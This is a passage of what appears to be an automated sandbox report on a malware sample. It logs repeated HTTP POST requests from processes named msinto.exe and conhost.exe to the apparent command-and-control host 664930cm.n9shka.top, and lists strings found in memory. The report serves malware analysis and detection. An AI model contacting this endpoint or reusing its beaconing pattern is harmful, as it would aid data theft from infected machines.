                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 664930cm.n9shka.top
                                    Source: unknownHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://664930cm.n9P
                                    Source: conhost.exe, 00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002707000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://664930cm.n9shka.top
                                    Source: conhost.exe, 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://664930cm.n9shka.top/
                                    Source: conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.000000000280C000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002800000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002707000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php
                                    Source: msinto.exe, 0000000A.00000002.2389367064.0000000003795000.00000004.00000800.00020000.00000000.sdmp, msinto.exe, 0000000A.00000002.2389367064.0000000003149000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012D30000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001332F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000138E7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012961000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012B49000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012C98000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012F81000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013028000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013CB6000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.000000001397F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013147000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000012AB0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013D4F000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013797000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013517000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000135AF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000136FF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000133C7000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.0000000013B67000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3417373379.00000000128C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
